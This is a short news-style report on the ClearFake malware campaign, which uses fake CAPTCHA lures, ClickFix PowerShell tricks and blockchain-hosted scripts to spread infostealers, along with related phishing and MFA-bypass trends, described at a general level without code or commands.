Cybercriminals behind the ClearFake campaign continue to refine their attack techniques, employing fake reCAPTCHA and Cloudflare Turnstile verifications to facilitate the distribution of malicious software. Since July 2023, this group has actively leveraged compromised WordPress sites, disguising malicious browser updates as legitimate downloads.
A newly observed attack variant, utilizing the ClickFix method, manipulates victims into executing malicious PowerShell commands under the guise of resolving nonexistent technical issues.
According to Sekoia, the threat actors have also adopted EtherHiding, a technique that enables them to deploy malicious scripts via Binance Smart Chain (BSC) smart contracts. This approach enhances the attack’s resilience against detection and takedown efforts.
The primary objective of these attacks is to distribute infostealers such as Lumma Stealer and Vidar Stealer, which are capable of exfiltrating sensitive data from devices running Windows and macOS. As of May 2024, over 9,300 websites have been compromised by ClearFake, potentially exposing around 200,000 users to phishing lures and malware infections.
A particularly notable incident involved car dealerships, where malicious code was injected through a third-party video service, LES Automotive. This exemplifies a supply chain attack, in which threat actors exploit vulnerabilities in external services to compromise primary websites.
Parallel to ClearFake, researchers have observed phishing campaigns leveraging virtual hard disks (VHDs) and Microsoft Excel vulnerabilities to propagate Venom RAT, AsyncRAT, and Remcos RAT. Additionally, misconfigurations in Microsoft 365 are being exploited to hijack user accounts and bypass multi-factor authentication (MFA).
Experts warn that Adversary-in-the-Middle (AitM) and Browser-in-the-Middle (BitM) attacks are becoming increasingly sophisticated, allowing threat actors to intercept user sessions—even those protected by MFA—posing a severe security risk.
